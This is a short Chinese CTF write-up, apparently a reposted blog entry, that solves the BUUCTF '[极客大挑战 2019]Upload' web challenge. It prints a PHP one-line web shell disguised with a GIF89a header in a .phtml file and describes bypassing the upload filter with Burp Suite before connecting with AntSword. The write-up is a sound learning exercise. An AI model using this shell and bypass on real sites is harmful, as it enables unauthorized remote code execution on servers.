CTF-Web-[极客大挑战 2019]Upload

博客说明

文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！

网址

Web类，[极客大挑战 2019]Upload

打开题目的实例

做一个phtml的文件

将里面的内容改为一句话木马，为我们后面的蚁剑连接做准备

GIF89a
<script language="php">eval($_POST['shell']);</script>

我们将它上传，使用bp截取，修改一下格式，再放行

我们使用蚁剑连接，猜测路径为upload

/upload/test.phtml

完整路径

http://3cc0c310-5536-49f0-8e10-1aca744981b8.node3.buuoj.cn/upload/test.phtml

密码就是我们在一句话密码里面写的

shell

然后我们就进来了

像这样的话直接找根目录，发现flag

感谢

BUUCTF

以及勤劳的自己

来源：oschina

链接：https://my.oschina.net/u/4137262/blog/4263524

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!